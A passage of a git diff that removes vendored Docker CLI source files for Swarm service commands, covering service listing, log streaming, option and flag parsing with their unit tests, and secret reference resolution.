args []string) error { - return runList(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") - - return cmd -} - -func runList(dockerCli *command.DockerCli, opts listOptions) error { - ctx := context.Background() - client := dockerCli.Client() - out := dockerCli.Out() - - services, err := client.ServiceList(ctx, 
types.ServiceListOptions{Filters: opts.filter.Value()}) - if err != nil { - return err - } - - if len(services) > 0 && !opts.quiet { - // only non-empty services and not quiet, should we call TaskList and NodeList api - taskFilter := filters.NewArgs() - for _, service := range services { - taskFilter.Add("service", service.ID) - } - - tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: taskFilter}) - if err != nil { - return err - } - - nodes, err := client.NodeList(ctx, types.NodeListOptions{}) - if err != nil { - return err - } - - PrintNotQuiet(out, services, nodes, tasks) - } else if !opts.quiet { - // no services and not quiet, print only one line with columns ID, NAME, MODE, REPLICAS... - PrintNotQuiet(out, services, []swarm.Node{}, []swarm.Task{}) - } else { - PrintQuiet(out, services) - } - - return nil -} - -// PrintNotQuiet shows service list in a non-quiet way. -// Besides this, command `docker stack services xxx` will call this, too. -func PrintNotQuiet(out io.Writer, services []swarm.Service, nodes []swarm.Node, tasks []swarm.Task) { - activeNodes := make(map[string]struct{}) - for _, n := range nodes { - if n.Status.State != swarm.NodeStateDown { - activeNodes[n.ID] = struct{}{} - } - } - - running := map[string]int{} - tasksNoShutdown := map[string]int{} - - for _, task := range tasks { - if task.DesiredState != swarm.TaskStateShutdown { - tasksNoShutdown[task.ServiceID]++ - } - - if _, nodeActive := activeNodes[task.NodeID]; nodeActive && task.Status.State == swarm.TaskStateRunning { - running[task.ServiceID]++ - } - } - - printTable(out, services, running, tasksNoShutdown) -} - -func printTable(out io.Writer, services []swarm.Service, running, tasksNoShutdown map[string]int) { - writer := tabwriter.NewWriter(out, 0, 4, 2, ' ', 0) - - // Ignore flushing errors - defer writer.Flush() - - fmt.Fprintf(writer, listItemFmt, "ID", "NAME", "MODE", "REPLICAS", "IMAGE") - - for _, service := range services { - mode := "" - replicas := "" - if 
service.Spec.Mode.Replicated != nil && service.Spec.Mode.Replicated.Replicas != nil { - mode = "replicated" - replicas = fmt.Sprintf("%d/%d", running[service.ID], *service.Spec.Mode.Replicated.Replicas) - } else if service.Spec.Mode.Global != nil { - mode = "global" - replicas = fmt.Sprintf("%d/%d", running[service.ID], tasksNoShutdown[service.ID]) - } - image := service.Spec.TaskTemplate.ContainerSpec.Image - ref, err := distreference.ParseNamed(image) - if err == nil { - // update image string for display - namedTagged, ok := ref.(distreference.NamedTagged) - if ok { - image = namedTagged.Name() + ":" + namedTagged.Tag() - } - } - - fmt.Fprintf( - writer, - listItemFmt, - stringid.TruncateID(service.ID), - service.Spec.Name, - mode, - replicas, - image) - } -} - -// PrintQuiet shows service list in a quiet way. -// Besides this, command `docker stack services xxx` will call this, too. -func PrintQuiet(out io.Writer, services []swarm.Service) { - for _, service := range services { - fmt.Fprintln(out, service.ID) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/service/logs.go b/vendor/github.com/docker/docker/cli/command/service/logs.go deleted file mode 100644 index 19d3d9a488..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/logs.go +++ /dev/null @@ -1,163 +0,0 @@ -package service - -import ( - "bytes" - "fmt" - "io" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/idresolver" - "github.com/docker/docker/pkg/stdcopy" - "github.com/spf13/cobra" -) - -type logsOptions struct { - noResolve bool - follow bool - since string - timestamps bool - details bool - tail string - - service string -} - -func newLogsCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts logsOptions - - cmd := &cobra.Command{ - Use: "logs [OPTIONS] SERVICE", 
- Short: "Fetch the logs of a service", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.service = args[0] - return runLogs(dockerCli, &opts) - }, - Tags: map[string]string{"experimental": ""}, - } - - flags := cmd.Flags() - flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names") - flags.BoolVarP(&opts.follow, "follow", "f", false, "Follow log output") - flags.StringVar(&opts.since, "since", "", "Show logs since timestamp") - flags.BoolVarP(&opts.timestamps, "timestamps", "t", false, "Show timestamps") - flags.BoolVar(&opts.details, "details", false, "Show extra details provided to logs") - flags.StringVar(&opts.tail, "tail", "all", "Number of lines to show from the end of the logs") - return cmd -} - -func runLogs(dockerCli *command.DockerCli, opts *logsOptions) error { - ctx := context.Background() - - options := types.ContainerLogsOptions{ - ShowStdout: true, - ShowStderr: true, - Since: opts.since, - Timestamps: opts.timestamps, - Follow: opts.follow, - Tail: opts.tail, - Details: opts.details, - } - - client := dockerCli.Client() - responseBody, err := client.ServiceLogs(ctx, opts.service, options) - if err != nil { - return err - } - defer responseBody.Close() - - resolver := idresolver.New(client, opts.noResolve) - - stdout := &logWriter{ctx: ctx, opts: opts, r: resolver, w: dockerCli.Out()} - stderr := &logWriter{ctx: ctx, opts: opts, r: resolver, w: dockerCli.Err()} - - // TODO(aluzzardi): Do an io.Copy for services with TTY enabled. 
- _, err = stdcopy.StdCopy(stdout, stderr, responseBody) - return err -} - -type logWriter struct { - ctx context.Context - opts *logsOptions - r *idresolver.IDResolver - w io.Writer -} - -func (lw *logWriter) Write(buf []byte) (int, error) { - contextIndex := 0 - numParts := 2 - if lw.opts.timestamps { - contextIndex++ - numParts++ - } - - parts := bytes.SplitN(buf, []byte(" "), numParts) - if len(parts) != numParts { - return 0, fmt.Errorf("invalid context in log message: %v", string(buf)) - } - - taskName, nodeName, err := lw.parseContext(string(parts[contextIndex])) - if err != nil { - return 0, err - } - - output := []byte{} - for i, part := range parts { - // First part doesn't get space separation. - if i > 0 { - output = append(output, []byte(" ")...) - } - - if i == contextIndex { - // TODO(aluzzardi): Consider constant padding. - output = append(output, []byte(fmt.Sprintf("%s@%s |", taskName, nodeName))...) - } else { - output = append(output, part...) - } - } - _, err = lw.w.Write(output) - if err != nil { - return 0, err - } - - return len(buf), nil -} - -func (lw *logWriter) parseContext(input string) (string, string, error) { - context := make(map[string]string) - - components := strings.Split(input, ",") - for _, component := range components { - parts := strings.SplitN(component, "=", 2) - if len(parts) != 2 { - return "", "", fmt.Errorf("invalid context: %s", input) - } - context[parts[0]] = parts[1] - } - - taskID, ok := context["com.docker.swarm.task.id"] - if !ok { - return "", "", fmt.Errorf("missing task id in context: %s", input) - } - taskName, err := lw.r.Resolve(lw.ctx, swarm.Task{}, taskID) - if err != nil { - return "", "", err - } - - nodeID, ok := context["com.docker.swarm.node.id"] - if !ok { - return "", "", fmt.Errorf("missing node id in context: %s", input) - } - nodeName, err := lw.r.Resolve(lw.ctx, swarm.Node{}, nodeID) - if err != nil { - return "", "", err - } - - return taskName, nodeName, nil -} diff --git 
a/vendor/github.com/docker/docker/cli/command/service/opts.go b/vendor/github.com/docker/docker/cli/command/service/opts.go deleted file mode 100644 index cbe544aacc..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/opts.go +++ /dev/null @@ -1,648 +0,0 @@ -package service - -import ( - "encoding/csv" - "fmt" - "os" - "path/filepath" - "strconv" - "strings" - "time" - - "github.com/docker/docker/api/types/container" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/opts" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/docker/go-connections/nat" - units "github.com/docker/go-units" - "github.com/spf13/cobra" -) - -type int64Value interface { - Value() int64 -} - -type memBytes int64 - -func (m *memBytes) String() string { - return units.BytesSize(float64(m.Value())) -} - -func (m *memBytes) Set(value string) error { - val, err := units.RAMInBytes(value) - *m = memBytes(val) - return err -} - -func (m *memBytes) Type() string { - return "bytes" -} - -func (m *memBytes) Value() int64 { - return int64(*m) -} - -// PositiveDurationOpt is an option type for time.Duration that uses a pointer. -// It bahave similarly to DurationOpt but only allows positive duration values. -type PositiveDurationOpt struct { - DurationOpt -} - -// Set a new value on the option. Setting a negative duration value will cause -// an error to be returned. -func (d *PositiveDurationOpt) Set(s string) error { - err := d.DurationOpt.Set(s) - if err != nil { - return err - } - if *d.DurationOpt.value < 0 { - return fmt.Errorf("duration cannot be negative") - } - return nil -} - -// DurationOpt is an option type for time.Duration that uses a pointer. 
This -// allows us to get nil values outside, instead of defaulting to 0 -type DurationOpt struct { - value *time.Duration -} - -// Set a new value on the option -func (d *DurationOpt) Set(s string) error { - v, err := time.ParseDuration(s) - d.value = &v - return err -} - -// Type returns the type of this option, which will be displayed in `--help` output -func (d *DurationOpt) Type() string { - return "duration" -} - -// String returns a string repr of this option -func (d *DurationOpt) String() string { - if d.value != nil { - return d.value.String() - } - return "" -} - -// Value returns the time.Duration -func (d *DurationOpt) Value() *time.Duration { - return d.value -} - -// Uint64Opt represents a uint64. -type Uint64Opt struct { - value *uint64 -} - -// Set a new value on the option -func (i *Uint64Opt) Set(s string) error { - v, err := strconv.ParseUint(s, 0, 64) - i.value = &v - return err -} - -// Type returns the type of this option, which will be displayed in `--help` output -func (i *Uint64Opt) Type() string { - return "uint" -} - -// String returns a string repr of this option -func (i *Uint64Opt) String() string { - if i.value != nil { - return fmt.Sprintf("%v", *i.value) - } - return "" -} - -// Value returns the uint64 -func (i *Uint64Opt) Value() *uint64 { - return i.value -} - -type floatValue float32 - -func (f *floatValue) Set(s string) error { - v, err := strconv.ParseFloat(s, 32) - *f = floatValue(v) - return err -} - -func (f *floatValue) Type() string { - return "float" -} - -func (f *floatValue) String() string { - return strconv.FormatFloat(float64(*f), 'g', -1, 32) -} - -func (f *floatValue) Value() float32 { - return float32(*f) -} - -// SecretRequestSpec is a type for requesting secrets -type SecretRequestSpec struct { - source string - target string - uid string - gid string - mode os.FileMode -} - -// SecretOpt is a Value type for parsing secrets -type SecretOpt struct { - values []*SecretRequestSpec -} - -// Set a new secret value 
-func (o *SecretOpt) Set(value string) error { - csvReader := csv.NewReader(strings.NewReader(value)) - fields, err := csvReader.Read() - if err != nil { - return err - } - - spec := &SecretRequestSpec{ - source: "", - target: "", - uid: "0", - gid: "0", - mode: 0444, - } - - for _, field := range fields { - parts := strings.SplitN(field, "=", 2) - key := strings.ToLower(parts[0]) - - if len(parts) != 2 { - return fmt.Errorf("invalid field '%s' must be a key=value pair", field) - } - - value := parts[1] - switch key { - case "source", "src": - spec.source = value - case "target": - tDir, _ := filepath.Split(value) - if tDir != "" { - return fmt.Errorf("target must not have a path") - } - spec.target = value - case "uid": - spec.uid = value - case "gid": - spec.gid = value - case "mode": - m, err := strconv.ParseUint(value, 0, 32) - if err != nil { - return fmt.Errorf("invalid mode specified: %v", err) - } - - spec.mode = os.FileMode(m) - default: - return fmt.Errorf("invalid field in secret request: %s", key) - } - } - - if spec.source == "" { - return fmt.Errorf("source is required") - } - - o.values = append(o.values, spec) - return nil -} - -// Type returns the type of this option -func (o *SecretOpt) Type() string { - return "secret" -} - -// String returns a string repr of this option -func (o *SecretOpt) String() string { - secrets := []string{} - for _, secret := range o.values { - repr := fmt.Sprintf("%s -> %s", secret.source, secret.target) - secrets = append(secrets, repr) - } - return strings.Join(secrets, ", ") -} - -// Value returns the secret requests -func (o *SecretOpt) Value() []*SecretRequestSpec { - return o.values -} - -type updateOptions struct { - parallelism uint64 - delay time.Duration - monitor time.Duration - onFailure string - maxFailureRatio floatValue -} - -type resourceOptions struct { - limitCPU opts.NanoCPUs - limitMemBytes memBytes - resCPU opts.NanoCPUs - resMemBytes memBytes -} - -func (r *resourceOptions) ToResourceRequirements() 
*swarm.ResourceRequirements { - return &swarm.ResourceRequirements{ - Limits: &swarm.Resources{ - NanoCPUs: r.limitCPU.Value(), - MemoryBytes: r.limitMemBytes.Value(), - }, - Reservations: &swarm.Resources{ - NanoCPUs: r.resCPU.Value(), - MemoryBytes: r.resMemBytes.Value(), - }, - } -} - -type restartPolicyOptions struct { - condition string - delay DurationOpt - maxAttempts Uint64Opt - window DurationOpt -} - -func (r *restartPolicyOptions) ToRestartPolicy() *swarm.RestartPolicy { - return &swarm.RestartPolicy{ - Condition: swarm.RestartPolicyCondition(r.condition), - Delay: r.delay.Value(), - MaxAttempts: r.maxAttempts.Value(), - Window: r.window.Value(), - } -} - -func convertNetworks(networks []string) []swarm.NetworkAttachmentConfig { - nets := []swarm.NetworkAttachmentConfig{} - for _, network := range networks { - nets = append(nets, swarm.NetworkAttachmentConfig{Target: network}) - } - return nets -} - -type endpointOptions struct { - mode string - publishPorts opts.PortOpt -} - -func (e *endpointOptions) ToEndpointSpec() *swarm.EndpointSpec { - return &swarm.EndpointSpec{ - Mode: swarm.ResolutionMode(strings.ToLower(e.mode)), - Ports: e.publishPorts.Value(), - } -} - -type logDriverOptions struct { - name string - opts opts.ListOpts -} - -func newLogDriverOptions() logDriverOptions { - return logDriverOptions{opts: opts.NewListOpts(runconfigopts.ValidateEnv)} -} - -func (ldo *logDriverOptions) toLogDriver() *swarm.Driver { - if ldo.name == "" { - return nil - } - - // set the log driver only if specified. 
- return &swarm.Driver{ - Name: ldo.name, - Options: runconfigopts.ConvertKVStringsToMap(ldo.opts.GetAll()), - } -} - -type healthCheckOptions struct { - cmd string - interval PositiveDurationOpt - timeout PositiveDurationOpt - retries int - noHealthcheck bool -} - -func (opts *healthCheckOptions) toHealthConfig() (*container.HealthConfig, error) { - var healthConfig *container.HealthConfig - haveHealthSettings := opts.cmd != "" || - opts.interval.Value() != nil || - opts.timeout.Value() != nil || - opts.retries != 0 - if opts.noHealthcheck { - if haveHealthSettings { - return nil, fmt.Errorf("--%s conflicts with --health-* options", flagNoHealthcheck) - } - healthConfig = &container.HealthConfig{Test: []string{"NONE"}} - } else if haveHealthSettings { - var test []string - if opts.cmd != "" { - test = []string{"CMD-SHELL", opts.cmd} - } - var interval, timeout time.Duration - if ptr := opts.interval.Value(); ptr != nil { - interval = *ptr - } - if ptr := opts.timeout.Value(); ptr != nil { - timeout = *ptr - } - healthConfig = &container.HealthConfig{ - Test: test, - Interval: interval, - Timeout: timeout, - Retries: opts.retries, - } - } - return healthConfig, nil -} - -// ValidatePort validates a string is in the expected format for a port definition -func ValidatePort(value string) (string, error) { - portMappings, err := nat.ParsePortSpec(value) - for _, portMapping := range portMappings { - if portMapping.Binding.HostIP != "" { - return "", fmt.Errorf("HostIP is not supported by a service.") - } - } - return value, err -} - -// convertExtraHostsToSwarmHosts converts an array of extra hosts in cli -// : -// into a swarmkit host format: -// IP_address canonical_hostname [aliases...] 
-// This assumes input value (:) has already been validated -func convertExtraHostsToSwarmHosts(extraHosts []string) []string { - hosts := []string{} - for _, extraHost := range extraHosts { - parts := strings.SplitN(extraHost, ":", 2) - hosts = append(hosts, fmt.Sprintf("%s %s", parts[1], parts[0])) - } - return hosts -} - -type serviceOptions struct { - name string - labels opts.ListOpts - containerLabels opts.ListOpts - image string - args []string - hostname string - env opts.ListOpts - envFile opts.ListOpts - workdir string - user string - groups opts.ListOpts - tty bool - mounts opts.MountOpt - dns opts.ListOpts - dnsSearch opts.ListOpts - dnsOption opts.ListOpts - hosts opts.ListOpts - - resources resourceOptions - stopGrace DurationOpt - - replicas Uint64Opt - mode string - - restartPolicy restartPolicyOptions - constraints opts.ListOpts - update updateOptions - networks opts.ListOpts - endpoint endpointOptions - - registryAuth bool - - logDriver logDriverOptions - - healthcheck healthCheckOptions - secrets opts.SecretOpt -} - -func newServiceOptions() *serviceOptions { - return &serviceOptions{ - labels: opts.NewListOpts(runconfigopts.ValidateEnv), - constraints: opts.NewListOpts(nil), - containerLabels: opts.NewListOpts(runconfigopts.ValidateEnv), - env: opts.NewListOpts(runconfigopts.ValidateEnv), - envFile: opts.NewListOpts(nil), - groups: opts.NewListOpts(nil), - logDriver: newLogDriverOptions(), - dns: opts.NewListOpts(opts.ValidateIPAddress), - dnsOption: opts.NewListOpts(nil), - dnsSearch: opts.NewListOpts(opts.ValidateDNSSearch), - hosts: opts.NewListOpts(runconfigopts.ValidateExtraHost), - networks: opts.NewListOpts(nil), - } -} - -func (opts *serviceOptions) ToService() (swarm.ServiceSpec, error) { - var service swarm.ServiceSpec - - envVariables, err := runconfigopts.ReadKVStrings(opts.envFile.GetAll(), opts.env.GetAll()) - if err != nil { - return service, err - } - - currentEnv := make([]string, 0, len(envVariables)) - for _, env := range 
envVariables { // need to process each var, in order - k := strings.SplitN(env, "=", 2)[0] - for i, current := range currentEnv { // remove duplicates - if current == env { - continue // no update required, may hide this behind flag to preserve order of envVariables - } - if strings.HasPrefix(current, k+"=") { - currentEnv = append(currentEnv[:i], currentEnv[i+1:]...) - } - } - currentEnv = append(currentEnv, env) - } - - service = swarm.ServiceSpec{ - Annotations: swarm.Annotations{ - Name: opts.name, - Labels: runconfigopts.ConvertKVStringsToMap(opts.labels.GetAll()), - }, - TaskTemplate: swarm.TaskSpec{ - ContainerSpec: swarm.ContainerSpec{ - Image: opts.image, - Args: opts.args, - Env: currentEnv, - Hostname: opts.hostname, - Labels: runconfigopts.ConvertKVStringsToMap(opts.containerLabels.GetAll()), - Dir: opts.workdir, - User: opts.user, - Groups: opts.groups.GetAll(), - TTY: opts.tty, - Mounts: opts.mounts.Value(), - DNSConfig: &swarm.DNSConfig{ - Nameservers: opts.dns.GetAll(), - Search: opts.dnsSearch.GetAll(), - Options: opts.dnsOption.GetAll(), - }, - Hosts: convertExtraHostsToSwarmHosts(opts.hosts.GetAll()), - StopGracePeriod: opts.stopGrace.Value(), - Secrets: nil, - }, - Networks: convertNetworks(opts.networks.GetAll()), - Resources: opts.resources.ToResourceRequirements(), - RestartPolicy: opts.restartPolicy.ToRestartPolicy(), - Placement: &swarm.Placement{ - Constraints: opts.constraints.GetAll(), - }, - LogDriver: opts.logDriver.toLogDriver(), - }, - Networks: convertNetworks(opts.networks.GetAll()), - Mode: swarm.ServiceMode{}, - UpdateConfig: &swarm.UpdateConfig{ - Parallelism: opts.update.parallelism, - Delay: opts.update.delay, - Monitor: opts.update.monitor, - FailureAction: opts.update.onFailure, - MaxFailureRatio: opts.update.maxFailureRatio.Value(), - }, - EndpointSpec: opts.endpoint.ToEndpointSpec(), - } - - healthConfig, err := opts.healthcheck.toHealthConfig() - if err != nil { - return service, err - } - 
service.TaskTemplate.ContainerSpec.Healthcheck = healthConfig - - switch opts.mode { - case "global": - if opts.replicas.Value() != nil { - return service, fmt.Errorf("replicas can only be used with replicated mode") - } - - service.Mode.Global = &swarm.GlobalService{} - case "replicated": - service.Mode.Replicated = &swarm.ReplicatedService{ - Replicas: opts.replicas.Value(), - } - default: - return service, fmt.Errorf("Unknown mode: %s", opts.mode) - } - return service, nil -} - -// addServiceFlags adds all flags that are common to both `create` and `update`. -// Any flags that are not common are added separately in the individual command -func addServiceFlags(cmd *cobra.Command, opts *serviceOptions) { - flags := cmd.Flags() - - flags.StringVarP(&opts.workdir, flagWorkdir, "w", "", "Working directory inside the container") - flags.StringVarP(&opts.user, flagUser, "u", "", "Username or UID (format: [:])") - flags.StringVar(&opts.hostname, flagHostname, "", "Container hostname") - - flags.Var(&opts.resources.limitCPU, flagLimitCPU, "Limit CPUs") - flags.Var(&opts.resources.limitMemBytes, flagLimitMemory, "Limit Memory") - flags.Var(&opts.resources.resCPU, flagReserveCPU, "Reserve CPUs") - flags.Var(&opts.resources.resMemBytes, flagReserveMemory, "Reserve Memory") - flags.Var(&opts.stopGrace, flagStopGracePeriod, "Time to wait before force killing a container (ns|us|ms|s|m|h)") - - flags.Var(&opts.replicas, flagReplicas, "Number of tasks") - - flags.StringVar(&opts.restartPolicy.condition, flagRestartCondition, "", "Restart when condition is met (none, on-failure, or any)") - flags.Var(&opts.restartPolicy.delay, flagRestartDelay, "Delay between restart attempts (ns|us|ms|s|m|h)") - flags.Var(&opts.restartPolicy.maxAttempts, flagRestartMaxAttempts, "Maximum number of restarts before giving up") - flags.Var(&opts.restartPolicy.window, flagRestartWindow, "Window used to evaluate the restart policy (ns|us|ms|s|m|h)") - - flags.Uint64Var(&opts.update.parallelism, 
flagUpdateParallelism, 1, "Maximum number of tasks updated simultaneously (0 to update all at once)") - flags.DurationVar(&opts.update.delay, flagUpdateDelay, time.Duration(0), "Delay between updates (ns|us|ms|s|m|h) (default 0s)") - flags.DurationVar(&opts.update.monitor, flagUpdateMonitor, time.Duration(0), "Duration after each task update to monitor for failure (ns|us|ms|s|m|h) (default 0s)") - flags.StringVar(&opts.update.onFailure, flagUpdateFailureAction, "pause", "Action on update failure (pause|continue)") - flags.Var(&opts.update.maxFailureRatio, flagUpdateMaxFailureRatio, "Failure rate to tolerate during an update") - - flags.StringVar(&opts.endpoint.mode, flagEndpointMode, "", "Endpoint mode (vip or dnsrr)") - - flags.BoolVar(&opts.registryAuth, flagRegistryAuth, false, "Send registry authentication details to swarm agents") - - flags.StringVar(&opts.logDriver.name, flagLogDriver, "", "Logging driver for service") - flags.Var(&opts.logDriver.opts, flagLogOpt, "Logging driver options") - - flags.StringVar(&opts.healthcheck.cmd, flagHealthCmd, "", "Command to run to check health") - flags.Var(&opts.healthcheck.interval, flagHealthInterval, "Time between running the check (ns|us|ms|s|m|h)") - flags.Var(&opts.healthcheck.timeout, flagHealthTimeout, "Maximum time to allow one check to run (ns|us|ms|s|m|h)") - flags.IntVar(&opts.healthcheck.retries, flagHealthRetries, 0, "Consecutive failures needed to report unhealthy") - flags.BoolVar(&opts.healthcheck.noHealthcheck, flagNoHealthcheck, false, "Disable any container-specified HEALTHCHECK") - - flags.BoolVarP(&opts.tty, flagTTY, "t", false, "Allocate a pseudo-TTY") -} - -const ( - flagConstraint = "constraint" - flagConstraintRemove = "constraint-rm" - flagConstraintAdd = "constraint-add" - flagContainerLabel = "container-label" - flagContainerLabelRemove = "container-label-rm" - flagContainerLabelAdd = "container-label-add" - flagDNS = "dns" - flagDNSRemove = "dns-rm" - flagDNSAdd = "dns-add" - flagDNSOption 
= "dns-option" - flagDNSOptionRemove = "dns-option-rm" - flagDNSOptionAdd = "dns-option-add" - flagDNSSearch = "dns-search" - flagDNSSearchRemove = "dns-search-rm" - flagDNSSearchAdd = "dns-search-add" - flagEndpointMode = "endpoint-mode" - flagHost = "host" - flagHostAdd = "host-add" - flagHostRemove = "host-rm" - flagHostname = "hostname" - flagEnv = "env" - flagEnvFile = "env-file" - flagEnvRemove = "env-rm" - flagEnvAdd = "env-add" - flagGroup = "group" - flagGroupAdd = "group-add" - flagGroupRemove = "group-rm" - flagLabel = "label" - flagLabelRemove = "label-rm" - flagLabelAdd = "label-add" - flagLimitCPU = "limit-cpu" - flagLimitMemory = "limit-memory" - flagMode = "mode" - flagMount = "mount" - flagMountRemove = "mount-rm" - flagMountAdd = "mount-add" - flagName = "name" - flagNetwork = "network" - flagPublish = "publish" - flagPublishRemove = "publish-rm" - flagPublishAdd = "publish-add" - flagReplicas = "replicas" - flagReserveCPU = "reserve-cpu" - flagReserveMemory = "reserve-memory" - flagRestartCondition = "restart-condition" - flagRestartDelay = "restart-delay" - flagRestartMaxAttempts = "restart-max-attempts" - flagRestartWindow = "restart-window" - flagStopGracePeriod = "stop-grace-period" - flagTTY = "tty" - flagUpdateDelay = "update-delay" - flagUpdateFailureAction = "update-failure-action" - flagUpdateMaxFailureRatio = "update-max-failure-ratio" - flagUpdateMonitor = "update-monitor" - flagUpdateParallelism = "update-parallelism" - flagUser = "user" - flagWorkdir = "workdir" - flagRegistryAuth = "with-registry-auth" - flagLogDriver = "log-driver" - flagLogOpt = "log-opt" - flagHealthCmd = "health-cmd" - flagHealthInterval = "health-interval" - flagHealthRetries = "health-retries" - flagHealthTimeout = "health-timeout" - flagNoHealthcheck = "no-healthcheck" - flagSecret = "secret" - flagSecretAdd = "secret-add" - flagSecretRemove = "secret-rm" -) diff --git a/vendor/github.com/docker/docker/cli/command/service/opts_test.go 
b/vendor/github.com/docker/docker/cli/command/service/opts_test.go deleted file mode 100644 index 78b956ad67..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/opts_test.go +++ /dev/null @@ -1,107 +0,0 @@ -package service - -import ( - "reflect" - "testing" - "time" - - "github.com/docker/docker/api/types/container" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestMemBytesString(t *testing.T) { - var mem memBytes = 1048576 - assert.Equal(t, mem.String(), "1 MiB") -} - -func TestMemBytesSetAndValue(t *testing.T) { - var mem memBytes - assert.NilError(t, mem.Set("5kb")) - assert.Equal(t, mem.Value(), int64(5120)) -} - -func TestNanoCPUsString(t *testing.T) { - var cpus opts.NanoCPUs = 6100000000 - assert.Equal(t, cpus.String(), "6.100") -} - -func TestNanoCPUsSetAndValue(t *testing.T) { - var cpus opts.NanoCPUs - assert.NilError(t, cpus.Set("0.35")) - assert.Equal(t, cpus.Value(), int64(350000000)) -} - -func TestDurationOptString(t *testing.T) { - dur := time.Duration(300 * 10e8) - duration := DurationOpt{value: &dur} - assert.Equal(t, duration.String(), "5m0s") -} - -func TestDurationOptSetAndValue(t *testing.T) { - var duration DurationOpt - assert.NilError(t, duration.Set("300s")) - assert.Equal(t, *duration.Value(), time.Duration(300*10e8)) - assert.NilError(t, duration.Set("-300s")) - assert.Equal(t, *duration.Value(), time.Duration(-300*10e8)) -} - -func TestPositiveDurationOptSetAndValue(t *testing.T) { - var duration PositiveDurationOpt - assert.NilError(t, duration.Set("300s")) - assert.Equal(t, *duration.Value(), time.Duration(300*10e8)) - assert.Error(t, duration.Set("-300s"), "cannot be negative") -} - -func TestUint64OptString(t *testing.T) { - value := uint64(2345678) - opt := Uint64Opt{value: &value} - assert.Equal(t, opt.String(), "2345678") - - opt = Uint64Opt{} - assert.Equal(t, opt.String(), "") -} - -func TestUint64OptSetAndValue(t *testing.T) { - var opt Uint64Opt - 
assert.NilError(t, opt.Set("14445")) - assert.Equal(t, *opt.Value(), uint64(14445)) -} - -func TestHealthCheckOptionsToHealthConfig(t *testing.T) { - dur := time.Second - opt := healthCheckOptions{ - cmd: "curl", - interval: PositiveDurationOpt{DurationOpt{value: &dur}}, - timeout: PositiveDurationOpt{DurationOpt{value: &dur}}, - retries: 10, - } - config, err := opt.toHealthConfig() - assert.NilError(t, err) - assert.Equal(t, reflect.DeepEqual(config, &container.HealthConfig{ - Test: []string{"CMD-SHELL", "curl"}, - Interval: time.Second, - Timeout: time.Second, - Retries: 10, - }), true) -} - -func TestHealthCheckOptionsToHealthConfigNoHealthcheck(t *testing.T) { - opt := healthCheckOptions{ - noHealthcheck: true, - } - config, err := opt.toHealthConfig() - assert.NilError(t, err) - assert.Equal(t, reflect.DeepEqual(config, &container.HealthConfig{ - Test: []string{"NONE"}, - }), true) -} - -func TestHealthCheckOptionsToHealthConfigConflict(t *testing.T) { - opt := healthCheckOptions{ - cmd: "curl", - noHealthcheck: true, - } - _, err := opt.toHealthConfig() - assert.Error(t, err, "--no-healthcheck conflicts with --health-* options") -} diff --git a/vendor/github.com/docker/docker/cli/command/service/parse.go b/vendor/github.com/docker/docker/cli/command/service/parse.go deleted file mode 100644 index ce9b454edd..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/parse.go +++ /dev/null @@ -1,68 +0,0 @@ -package service - -import ( - "fmt" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/filters" - swarmtypes "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/client" - "golang.org/x/net/context" -) - -// ParseSecrets retrieves the secrets from the requested names and converts -// them to secret references to use with the spec -func ParseSecrets(client client.SecretAPIClient, requestedSecrets []*types.SecretRequestOption) ([]*swarmtypes.SecretReference, error) { - secretRefs := 
make(map[string]*swarmtypes.SecretReference) - ctx := context.Background() - - for _, secret := range requestedSecrets { - if _, exists := secretRefs[secret.Target]; exists { - return nil, fmt.Errorf("duplicate secret target for %s not allowed", secret.Source) - } - secretRef := &swarmtypes.SecretReference{ - File: &swarmtypes.SecretReferenceFileTarget{ - Name: secret.Target, - UID: secret.UID, - GID: secret.GID, - Mode: secret.Mode, - }, - SecretName: secret.Source, - } - - secretRefs[secret.Target] = secretRef - } - - args := filters.NewArgs() - for _, s := range secretRefs { - args.Add("names", s.SecretName) - } - - secrets, err := client.SecretList(ctx, types.SecretListOptions{ - Filters: args, - }) - if err != nil { - return nil, err - } - - foundSecrets := make(map[string]string) - for _, secret := range secrets { - foundSecrets[secret.Spec.Annotations.Name] = secret.ID - } - - addedSecrets := []*swarmtypes.SecretReference{} - - for _, ref := range secretRefs { - id, ok := foundSecrets[ref.SecretName] - if !ok { - return nil, fmt.Errorf("secret not found: %s", ref.SecretName) - } - - // set the id for the ref to properly assign in swarm - // since swarm needs the ID instead of the name - ref.SecretID = id - addedSecrets = append(addedSecrets, ref) - } - - return addedSecrets, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/service/ps.go b/vendor/github.com/docker/docker/cli/command/service/ps.go deleted file mode 100644 index cf94ad7374..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/ps.go +++ /dev/null @@ -1,76 +0,0 @@ -package service - -import ( - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/idresolver" - "github.com/docker/docker/cli/command/node" - "github.com/docker/docker/cli/command/task" - "github.com/docker/docker/opts" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type psOptions struct { - 
